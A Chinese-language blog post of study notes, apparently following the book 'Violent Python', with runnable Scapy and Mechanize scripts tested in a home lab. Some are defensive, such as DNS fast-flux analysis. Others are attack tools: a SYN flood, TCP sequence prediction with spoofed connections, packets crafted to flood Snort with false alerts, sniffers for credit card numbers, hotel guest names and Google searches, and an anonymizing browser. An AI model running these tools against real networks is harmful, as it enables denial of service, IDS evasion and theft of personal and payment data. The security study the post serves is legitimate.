parser.add_option('-t', dest='thresh', type='int', help='specify threshold count ')
(options, args) = parser.parse_args()
if options.iface == None:
conf.iface = 'eth0'
else:
conf.iface = options.iface
# THRESH为全局变量,需先声明global再赋值才能生效
global THRESH
if options.thresh != None:
THRESH = options.thresh
else:
THRESH = 5
sniff(prn=testTTL, store=0)
if __name__ == '__main__':
main()
运行脚本监听后,启动Nmap伪造源地址扫描即可看到如下结果:
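脚本里用第三方的IPy库判断私有地址;如果不想额外安装IPy,Python 3标准库的ipaddress模块也能完成同样的判断(示意写法):

```python
import ipaddress

def is_private_ip(ipsrc):
    # 与 IPy 的 iptype() == 'PRIVATE' 等价的判断
    return ipaddress.ip_address(ipsrc).is_private

print(is_private_ip('192.168.220.128'))  # True,内网地址直接跳过
print(is_private_ip('8.8.8.8'))          # False,继续做TTL对比
```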
下面用nslookup命令来进行一次域名查询:
Wireshark抓包如下:
可以看到客户端发送DNSQR请求包,服务器发送DNSRR响应包。
一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。
一个DNSRR包含有资源记录名rrname、类型type、资源记录类别rclass、TTL以及资源数据rdata等。
解析pcap文件中所有含DNSRR的数据包,从中提取查询的域名(rrname)和对应的IP(rdata),以域名为键建立索引字典,并把字典中尚未出现的IP追加到该域名对应的列表中。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
dnsRecords = {}
def handlePkt(pkt):
# 判断是否含有DNSRR
if pkt.haslayer(DNSRR):
rrname = pkt.getlayer(DNSRR).rrname
rdata = pkt.getlayer(DNSRR).rdata
if dnsRecords.has_key(rrname):
if rdata not in dnsRecords[rrname]:
dnsRecords[rrname].append(rdata)
else:
dnsRecords[rrname] = []
dnsRecords[rrname].append(rdata)
def main():
pkts = rdpcap('fastFlux.pcap')
for pkt in pkts:
handlePkt(pkt)
for item in dnsRecords:
print "[+] " + item + " has " + str(len(dnsRecords[item])) + " unique IPs."
# for i in dnsRecords[item]:
# print "[*] " + i
# print
if __name__ == '__main__':
main()
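脚本中的has_key()是Python 2特有写法;同样的"域名到去重IP"逻辑用collections.defaultdict配合set会更简洁。下面是不依赖Scapy的纯逻辑示意,记录数据为虚构:

```python
from collections import defaultdict

# 模拟从 DNSRR 中提取出的 (rrname, rdata) 记录,数据为虚构
records = [
    ('example.com.', '1.1.1.1'),
    ('example.com.', '2.2.2.2'),
    ('example.com.', '1.1.1.1'),   # 重复IP,set自动去重
    ('test.org.', '3.3.3.3'),
]

dnsRecords = defaultdict(set)
for rrname, rdata in records:
    dnsRecords[rrname].add(rdata)

for name in sorted(dnsRecords):
    print('[+] %s has %d unique IPs.' % (name, len(dnsRecords[name])))
```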
用书上的数据包进行测试:
通常,Conficker会在感染后的几小时内生成大量DNS域名,其中很多是假域名,目的是掩盖真正的命令与控制服务器;因而要寻找的就是那些针对未知域名的查询回复出错信息的服务器响应包。
这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def dnsQRTest(pkt):
# 判断是否含有DNSRR且存在UDP端口53
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
rcode = pkt.getlayer(DNS).rcode
qname = pkt.getlayer(DNSQR).qname
# 若rcode为3,则表示该域名不存在
if rcode == 3:
print '[!] Name request lookup failed: ' + qname
return True
else:
return False
def main():
unAnsReqs = 0
pkts = rdpcap('domainFlux.pcap')
for pkt in pkts:
if dnsQRTest(pkt):
unAnsReqs = unAnsReqs + 1
print '[!] ' + str(unAnsReqs) + ' Total Unanswered Name Requests'
if __name__ == '__main__':
main()
书上示例数据包测试结果:
TCP序列号预测攻击利用的缺陷是:原本用于区分各条独立网络连接的TCP序列号,其生成缺乏随机性。
使用Scapy构造一些带有TCP协议层的IP数据包,让这些包的TCP源端口不断自增一,而目的TCP端口固定为513。
先确认目标主机开启了513端口,然后进行SYN洪泛攻击:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def synFlood(src, tgt):
# TCP源端口不断自增一,而目标端口513不变
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
src = "192.168.220.132"
tgt = "192.168.220.128"
synFlood(src, tgt)
运行结果:
主要通过依次发送TCP SYN数据包,从陆续收到的SYN/ACK包中计算TCP序列号之差,查看是否存在可被预测的规律。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
for x in range(1, 5):
if preNum != 0:
preNum = seqNum
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seqNum = ans.getlayer(TCP).seq
diffSeq = seqNum - preNum
print '[+] TCP Seq Difference: ' + str(diffSeq)
return seqNum + diffSeq
tgt = "192.168.220.128"
seqNum = calTSN(tgt)
print "[+] Next TCP Sequence Number to ACK is: " + str(seqNum + 1)
运行结果:
应该是存在问题的,修改一下输出看看:
可以看到preNum的值都为0,应该是代码中的逻辑出现问题了。
稍微修改一下代码:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
# 重复4次操作
for x in range(1,5):
# 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
# 逻辑出现问题
# if preNum != 0:
if seqNum != 0:
preNum = seqNum
# 构造并发送TCP SYN包
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
# 读取SYN/ACK包的TCP序列号
seqNum = ans.getlayer(TCP).seq
if preNum != 0:
diffSeq = seqNum - preNum
print "[*] preNum: %d seqNum: %d" % (preNum, seqNum)
print "[+] TCP Seq Difference: " + str(diffSeq)
print
return seqNum + diffSeq
tgt = "192.168.220.128"
seqNum = calTSN(tgt)
print "[+] Next TCP Sequence Number to ACK is: " + str(seqNum + 1)
运行结果:
可以看到,TCP序列号结果是随机的,即目标主机不存在该漏洞。
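这种"是否可预测"的判断也可以离线验证:收集若干SYN/ACK的序列号,看相邻差值是否恒定。下面是该对比逻辑的纯Python示意(序列号为虚构数据):

```python
# 相邻序列号差值恒定则可预测,否则视为随机
def is_predictable(seq_numbers):
    diffs = [b - a for a, b in zip(seq_numbers, seq_numbers[1:])]
    return len(set(diffs)) == 1, diffs

# 旧系统:每次固定递增64000,可预测
ok, diffs = is_predictable([1000, 65000, 129000, 193000])
print(ok, diffs[0])   # True 64000

# 现代系统:序列号随机,不可预测
ok, _ = is_predictable([914523, 12007841, 5523190, 30991275])
print(ok)             # False
```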
添加伪造TCP连接的spoofConn()函数,整合为一体,主要过程为先对远程服务器进行SYN洪泛攻击、使之拒绝服务,然后猜测TCP序列号并伪造TCP连接去跟目标主机建立TCP连接。
这里的代码只是简单实现了当时实现攻击的场景,现在由于TCP序列号的随机性已经比较难进行TCP猜测攻击了。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def synFlood(src, tgt):
# TCP源端口不断自增一,而目标端口513不变
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
# 重复4次操作
for x in range(1,5):
# 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
# 逻辑出现问题
# if preNum != 0:
if seqNum != 0:
preNum = seqNum
# 构造并发送TCP SYN包
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
# 读取SYN/ACK包的TCP序列号
seqNum = ans.getlayer(TCP).seq
if preNum != 0:
diffSeq = seqNum - preNum
print "[*] preNum: %d seqNum: %d" % (preNum, seqNum)
print "[+] TCP Seq Difference: " + str(diffSeq)
print
return seqNum + diffSeq
# 伪造TCP连接
def spoofConn(src, tgt, ack):
# 发送TCP SYN包
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514)
synPkt = IPlayer / TCPlayer
send(synPkt)
# 发送TCP ACK包
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514, ack=ack)
ackPkt = IPlayer / TCPlayer
send(ackPkt)
def main():
parser = optparse.OptionParser('[*]Usage: python mitnickAttack.py -s <synSpoof> -S <srcSpoof> -t <tgt>')
parser.add_option('-s', dest='synSpoof', type='string', help='specifc src for SYN Flood')
parser.add_option('-S', dest='srcSpoof', type='string', help='specify src for spoofed connection')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
(options, args) = parser.parse_args()
if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
print parser.usage
exit(0)
else:
synSpoof = options.synSpoof
srcSpoof = options.srcSpoof
tgt = options.tgt
print '[+] Starting SYN Flood to suppress remote server.'
synFlood(synSpoof, srcSpoof)
print '[+] Calculating correct TCP Sequence Number.'
seqNum = calTSN(tgt) + 1
print '[+] Spoofing Connection.'
spoofConn(srcSpoof, tgt, seqNum)
print '[+] Done.'
if __name__ == '__main__':
main()
运行结果:
测试时直接将发包数量设置小一点从而更好地看到输出结果。
这里IDS使用的是snort,本小节主要是通过分析snort的规则,制造假的攻击迹象来触发snort的警报,从而让目标系统产生大量警告而难以作出合理的判断。
先来查看snort的ddos规则:
vim /etc/snort/rules/ddos.rules
然后输入:/icmp_id:678 来直接查找
可以看到一条可利用来触发警报的规则"DDoS TFN探针":ICMP id为678、ICMP type为8、内容含有"1234";其他警报的特征也照着对应规则构造即可。只要构造出这样的ICMP包并发往目标主机就能触发警报。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
# 触发DDoS警报
def ddosTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
send(pkt, iface=iface, count=count)
src = "192.168.220.132"
dst = "192.168.220.129"
iface = "eth0"
count = 1
ddosTest(src, dst, iface, count)
运行结果:
检查snort警报日志,可以看到四个数据包都被IDS检测到并产生了警报:
snort -q -A console -i eth2 -c /etc/snort/snort.conf
输入上述命令查看日志期间可能会报错,如:
ERROR: /etc/snort/rules/community-smtp.rules(13) => !any is not allowed
ERROR: /etc/snort/rules/community-virus.rules(19) => !any is not allowed
这时就输入命令:vim /etc/snort/snort.conf,注释掉/etc/snort/rules/community-smtp.rules 和 /etc/snort/rules/community-virus.rules所在行即可。
再来查看snort的exploit.rules文件中的警报规则:
vim /etc/snort/rules/exploit.rules
然后输入:/EXPLOIT ntalkd x86 Linux overflow 来查找
可以看到,含有框出的指定字节序列就会触发警报。
为了生成含有该指定字节序列的数据包,可以使用符号\x,后面跟上该字节的十六进制值。注意的是其中的“89|F|”在Python中写成“\x89F”即可。
# 触发exploits警报
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
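snort规则的content字段用|..|包裹十六进制字节、其余为字面字符,手工换算成Python的\x转义容易出错。下面是一个把这种混合写法转成字节串的小工具(示意实现):

```python
def snort_content_to_bytes(content):
    # '|' 把字符串切成字面/十六进制交替的段:偶数段为字面字符,奇数段为hex字节
    parts = content.split('|')
    out = b''
    for i, part in enumerate(parts):
        if i % 2 == 0:
            out += part.encode('latin-1')
        else:
            out += bytes(bytearray(int(h, 16) for h in part.split()))
    return out

print(snort_content_to_bytes('|89|F'))            # b'\x89F'
print(snort_content_to_bytes('^|B0 02 89 06|'))   # b'^\xb0\x02\x89\x06'
```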
接着伪造踩点或扫描的操作来触发警报。
查看snort的scan.rules文件中的警报规则:
vim /etc/snort/rules/scan.rules
然后输入:/Amanda 来查找
可以看到,只要数据包中含有框出的特征码即可触发警报。
# 触发踩点扫描警报
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)
现在整合所有的代码,生成可以触发DDoS、exploits以及踩点扫描警报的数据包:
-s参数指定发送的源地址(这里伪造为1.2.3.4),-c参数指定发送次数,测试时发送一次即可。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
from random import randint
# 触发DDoS警报
def ddosTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
send(pkt, iface=iface, count=count)
# 触发exploits警报
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
# 触发踩点扫描警报
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)
def main():
parser = optparse.OptionParser('[*]Usage: python idsFoil.py -i <iface> -s <src> -t <tgt> -c <count>')
parser.add_option('-i', dest='iface', type='string', help='specify network interface')
parser.add_option('-s', dest='src', type='string', help='specify source address')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
parser.add_option('-c', dest='count', type='int', help='specify packet count')
(options, args) = parser.parse_args()
if options.iface == None:
iface = 'eth0'
else:
iface = options.iface
if options.src == None:
src = '.'.join([str(randint(1,254)) for x in range(4)])
else:
src = options.src
if options.tgt == None:
print parser.usage
exit(0)
else:
dst = options.tgt
if options.count == None:
count = 1
else:
count = options.count
ddosTest(src, dst, iface, count)
exploitTest(src, dst, iface, count)
scanTest(src, dst, iface, count)
if __name__ == '__main__':
main()
运行结果:
可以看到,一共发送了8个数据包。
切换到目标主机的snort进行警报信息查看,可以看到,触发了8条警报,且源地址显示的是伪造的IP:
本章大部分代码都是实现了但是缺乏相应的应用环境,想具体测试的可以直接找到对应的环境或者自行修改脚本以适应生活常用的环境。
插入无线网卡,输入iwconfig命令查看网卡信息:
将可能影响无线实验的因素排除掉,然后将网卡设置为监听(Monitor)模式:
确认进入Monitor模式:
测试嗅探无线网络的代码:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def pktPrint(pkt):
if pkt.haslayer(Dot11Beacon):
print '[+] Detected 802.11 Beacon Frame'
elif pkt.haslayer(Dot11ProbeReq):
print '[+] Detected 802.11 Probe Request Frame'
elif pkt.haslayer(TCP):
print '[+] Detected a TCP Packet'
elif pkt.haslayer(DNS):
print '[+] Detected a DNS Packet'
conf.iface = 'wlan0mon'
sniff(prn=pktPrint)
运行结果:
apt-get update
apt-get install python-bluez bluetooth python-obexftp
另外还需要一个蓝牙设备,测试能否识别该设备:hciconfig
由于本人没有蓝牙设备,蓝牙部分就先不进行测试。
这里主要查找书上所列的3种常用信用卡:Visa、MasterCard和American Express。
测试代码:
#!/usr/bin/python
#coding=utf-8
import re
def findCreditCard(raw):
# American Express信用卡由34或37开头的15位数字组成
americaRE = re.findall('3[47][0-9]{13}', raw)
if americaRE:
print '[+] Found American Express Card: ' + americaRE[0]
def main():
tests = []
tests.append('I would like to buy 1337 copies of that dvd')
tests.append('Bill my card: 378282246310005 for \$2600')
for test in tests:
findCreditCard(test)
if __name__ == '__main__':
main()
运行结果:
接着就加入Scapy来嗅探TCP数据包实现嗅探功能:
#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *
def findCreditCard(pkt):
raw = pkt.sprintf('%Raw.load%')
# American Express信用卡由34或37开头的15位数字组成
americaRE = re.findall('3[47][0-9]{13}', raw)
# MasterCard信用卡的开头为51~55,共16位数字
masterRE = re.findall('5[1-5][0-9]{14}', raw)
# Visa信用卡开头数字为4,长度为13或16位
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)
if americaRE:
print '[+] Found American Express Card: ' + americaRE[0]
if masterRE:
print '[+] Found MasterCard Card: ' + masterRE[0]
if visaRE:
print '[+] Found Visa Card: ' + visaRE[0]
def main():
parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Credit Card Sniffer.'
sniff(filter='tcp', prn=findCreditCard, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
运行结果:
本机流量里自然没有这几种信用卡号,它们在国内也不常见。其他信用卡号的规律可以自己发掘一下。
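正则只能匹配号码的格式,真实卡号还需满足Luhn校验和;在正则命中后再做一次Luhn校验,可以过滤掉大量碰巧符合格式的随机数字串。示意实现:

```python
def luhn_check(card_number):
    # 从右往左,第2、4、6...位数字乘2(大于9则减9),总和能被10整除即有效
    total = 0
    for i, ch in enumerate(reversed(card_number)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(luhn_check('378282246310005'))   # True,American Express官方测试卡号
print(luhn_check('378282246310006'))   # False,末位改动后校验失败
```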
这段脚本所在的网络环境是作者所在宾馆的环境,不同环境肯定有区别,可以自行抓包修改脚本实现嗅探。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%')
name = re.findall('(?i)LAST_NAME=(.*)&', raw)
room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
if name:
print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])
def main():
parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Hotel Guest Sniffer.'
sniff(filter='tcp', prn=findGuest, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
当然没有嗅探出信息:
Google搜索的URL中,查询字符串由"q="开始,中间是要搜索的内容,并以"&"终止;参数"pq="后接的则是上一次搜索的内容。
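与其手写正则,也可以直接用标准库解析URL查询串(这里用Python 3的urllib.parse演示,Python 2对应的是urlparse模块;URL为虚构示例):

```python
from urllib.parse import urlparse, parse_qs

# 虚构的一条Google搜索请求URL
url = 'http://www.google.com/search?q=python+hacking&pq=scapy+tutorial&hl=en'
query = parse_qs(urlparse(url).query)

print(query['q'][0])    # 当前搜索词,+ 已被还原为空格
print(query['pq'][0])   # 上一次的搜索词
```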
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGoogle(pkt):
if pkt.haslayer(Raw):
payload = pkt.getlayer(Raw).load
if 'GET' in payload:
if 'google' in payload:
r = re.findall(r'(?i)\&q=(.*?)\&', payload)
if r:
search = r[0].split('&')[0]
search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ')
print '[+] Searched For: ' + search
def main():
parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Google Sniffer.'
sniff(filter='tcp port 80', prn=findGoogle)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
嗅探不到什么结果的就不给出截图了,后面部分也一样。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
interface = 'wlan0mon'
probeReqs = []
def sniffProbe(p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[+] Detected New Probe Request: ' + netName
sniff(iface=interface, prn=sniffProbe)
def sniffDot11(p):
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: with MAC:' + addr2
hiddenNets.append(addr2)
#!/usr/bin/python
#coding=utf-8
import sys
from scapy.all import *
interface = 'wlan0mon'
hiddenNets = []
unhiddenNets = []
def sniffDot11(p):
if p.haslayer(Dot11ProbeResp):
addr2 = p.getlayer(Dot11).addr2
if (addr2 in hiddenNets) and (addr2 not in unhiddenNets):
netName = p.getlayer(Dot11ProbeResp).info
print '[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2
unhiddenNets.append(addr2)
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: with MAC:' + addr2
hiddenNets.append(addr2)
sniff(iface=interface, prn=sniffDot11)
本章后面的代码实用性不高,暂时也不贴该块的代码了,也没有测试的环境。
Mechanize库的Browser类允许我们对浏览器中的任何内容进行操作。
#!/usr/bin/python
#coding=utf-8
import mechanize
def viewPage(url):
browser = mechanize.Browser()
page = browser.open(url)
source_code = page.read()
print source_code
viewPage('http://www.imooc.com/')
运行结果:
书上是从http://www.hidemyass.com/获取一个代理IP,并通过http://ip.ntfsc.noaa.gov/显示的当前IP来测试代理是否可用。但这两个网址现在都无法正常访问,那就直接换用国内的站点,具体可参考《Python爬虫之基础篇》中的代理IP部分。
为了方便,直接用之前的脚本找找哪些代理IP可用。有一点要注意:查看当前IP的网址换成了http://2017.ip138.com/ic.asp,之前那个网址现在查到的是CDN节点IP。
agentIP.py的运行结果:
直接找显示可行的那个代理IP下来,编写使用Mechanize验证代理IP的脚本:
#!/usr/bin/python
#coding=utf-8
import mechanize
def testProxy(url, proxy):
browser = mechanize.Browser()
browser.set_proxies(proxy)
page = browser.open(url)
source_code = page.read()
print source_code
url = 'http://2017.ip138.com/ic.asp'
hideMeProxy = {'http': '139.196.202.164:9001'}
testProxy(url, hideMeProxy)
运行结果:
可以看到,页面显示的IP地址确实是代理的IP地址。
另外还要添加User-Agent的匿名,在http://www.useragentstring.com/pages/useragentstring.php中有很多版本的UA提供。另外,该页面http://whatismyuseragent.dotdoh.com提供将UA显示在页面的功能,但现在已经用不了了。还是写上书上的源代码:
#!/usr/bin/python
#coding=utf-8
import mechanize
def testUserAgent(url, userAgent):
browser = mechanize.Browser()
browser.addheaders = userAgent
page = browser.open(url)
source_code = page.read()
print source_code
url = 'http://whatismyuseragent.dotdoh.com/'
userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')]
testUserAgent(url, userAgent)
下面是个人修改的部分,同样以页面返回的形式来验证UA:
先换个国内查看UA的网页吧:http://www.atool.org/useragent.php
刚打开时会出现如图等待的页面,过了5秒后才真正地跳转到返回UA的页面:
这主要是为了拦截静态爬虫以及不具备浏览器特征的请求,Mechanize库在这里不起作用,那就简单编写一个动态爬虫来绕过这个机制。
查看下源代码中的标签内容:
根据这个标签的特征,编写验证UA的动态爬虫,这里设置webdriver驱动UA有两种方式:
#!/usr/bin/python
#coding=utf-8
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup as BS
import time
url = 'http://www.atool.org/useragent.php'
# 设置PhantomJS的请求头
# dcap = dict(DesiredCapabilities.PHANTOMJS)
# dcap["phantomjs.page.settings.userAgent"] = ("Hello World! BY PhantomJS")
# driver = webdriver.PhantomJS(executable_path='E:\Python27\Scripts\phantomjs-2.1.1-windows\\bin\phantomjs.exe', desired_capabilities=dcap)
# 设置Chrome的请求头
options = webdriver.ChromeOptions()
options.add_argument('--user-agent=Hello World! BY Chrome')
driver = webdriver.Chrome(chrome_options=options)
driver.get(url)
time.sleep(5)
page_source = driver.page_source
soup = BS(page_source, 'lxml')
ua = soup.find_all(name='input', attrs={'id':'ua_code'})[0].get('value')
print "[*] Your User-Agent is: " + ua
看看Chrome驱动返回的数据:
接着和Cookielib库一起使用,使用一个能把各个不同的cookie保存到磁盘中的容器,该功能允许用户收到cookie后不必把它返回给网站,且可以查看其中的内容:
#!/usr/bin/python
#coding=utf-8
import mechanize
import cookielib
def printCookies(url):
browser = mechanize.Browser()
cookie_jar = cookielib.LWPCookieJar()
browser.set_cookiejar(cookie_jar)
page = browser.open(url)
for cookie in cookie_jar:
print cookie
url = 'http://www.imooc.com/'
printCookies(url)
运行结果:
现在把前面代码中的几个匿名操作函数集成到一个新类anonBrowser中。该类继承Mechanize库的Browser类,封装了前面所有的函数,并添加了__init__()函数,其参数允许用户自定义代理列表和UA列表。
#!/usr/bin/python
#coding=utf-8
import mechanize
import cookielib
import random
import time
class anonBrowser(mechanize.Browser):
def __init__(self, proxies = [], user_agents = []):
mechanize.Browser.__init__(self)
self.set_handle_robots(False)
# 可供用户使用的代理服务器列表
self.proxies = proxies
# user_agent列表
self.user_agents = user_agents + ['Mozilla/4.0 ', 'FireFox/6.01','ExactSearch', 'Nokia7110/1.0']
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
self.anonymize()
# 清空cookie
def clear_cookies(self):
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
# 从user_agent列表中随机设置一个user_agent
def change_user_agent(self):
index = random.randrange(0, len(self.user_agents) )
self.addheaders = [('User-agent', ( self.user_agents[index] ))]
# 从代理列表中随机设置一个代理
def change_proxy(self):
if self.proxies:
index = random.randrange(0, len(self.proxies))
self.set_proxies( {'http': self.proxies[index]} )
# 调用上述三个函数改变UA、代理以及清空cookie以提高匿名性,其中sleep参数可让进程休眠以进一步提高匿名效果
def anonymize(self, sleep = False):
self.clear_cookies()
self.change_user_agent()
self.change_proxy()
if sleep:
time.sleep(60)
测试每次是否使用不同的cookie访问:
#!/usr/bin/python
#coding=utf-8
from anonBrowser import *
ab = anonBrowser(proxies=[], user_agents=[('User-agent','superSecretBroswer')])
for attempt in range(1, 5):
# 每次访问都进行一次匿名操作
ab.anonymize()
print '[*] Fetching page'
response = ab.open('http://www.kittenwar.com/')
for cookie in ab.cookie_jar:
print cookie
访问http://www.kittenwar.com/,可以看到每次都使用不同的cookie:
下面的脚本主要比较使用re模块和BeautifulSoup模块爬取页面数据的区别。
#!/usr/bin/python
#coding=utf-8
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
import re
def printLinks(url):
ab = anonBrowser()
ab.anonymize()
page = ab.open(url)
html = page.read()
# 使用re模块解析href链接
try:
print '[+] Printing Links From Regex.'
link_finder = re.compile('href="(.*?)"')
links = link_finder.findall(html)
for link in links:
print link
except:
pass
# 使用bs4模块解析href链接
try:
print '\n[+] Printing Links From BeautifulSoup.'
soup = BeautifulSoup(html)
links = soup.findAll(name='a')
for link in links:
if link.has_key('href'):
print link['href']
except:
pass
def main():
parser = optparse.OptionParser('[*]Usage: python linkParser.py -u <targetURL>')
parser.add_option('-u', dest='tgtURL', type='string', help='specify target url')
(options, args) = parser.parse_args()
url = options.tgtURL
if url == None:
print parser.usage
exit(0)
else:
printLinks(url)
if __name__ == '__main__':
main()
运行结果:
可以看到,re模块解析的结果是含有styles.css链接,而BeautifulSoup模块却会自己识别并忽略掉。
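这个区别可以用一小段HTML直接验证:正则把所有href属性都抓出来(包括<link>引用的样式表),而基于标签的解析只取<a>标签。下面用标准库html.parser(Python 3)代替BeautifulSoup做示意:

```python
import re
from html.parser import HTMLParser

page = '<link href="styles.css"><a href="page.html">link</a>'

# 正则:不区分标签,styles.css也被匹配进来
regex_links = re.findall(r'href="(.*?)"', page)

# 标签解析:只收集<a>标签的href属性
class LinkParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []
    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self.links += [v for k, v in attrs if k == 'href']

parser = LinkParser()
parser.feed(page)
print(regex_links)    # ['styles.css', 'page.html']
print(parser.links)   # ['page.html']
```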
主要用BS寻找img标签,然后使用browser对象下载图片并以二进制的形式保存到本地目录中。
#!/usr/bin/python
#coding=utf-8
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
def mirrorImages(url, dir):
ab = anonBrowser()
ab.anonymize()
html = ab.open(url)
soup = BeautifulSoup(html)
image_tags = soup.findAll('img')
for image in image_tags:
# 注意:lstrip()按"字符集合"删除左侧字符而非删除前缀,直接lstrip('http://')会误删以h/t/p等字符开头的内容
filename = image['src']
if filename.startswith('http://'):
filename = filename[len('http://'):]
filename = os.path.join(dir, filename.replace('/', '_'))
print '[+] Saving ' + str(filename)
data = ab.open(image['src']).read()
# 回退
ab.back()
save = open(filename, 'wb')
save.write(data)
save.close()
def main():
parser = optparse.OptionParser('[*]Usage: python imageMirror.py -u <targetURL> -d <destDirectory>')
parser.add_option('-u', dest='tgtURL', type='string', help='specify target url')
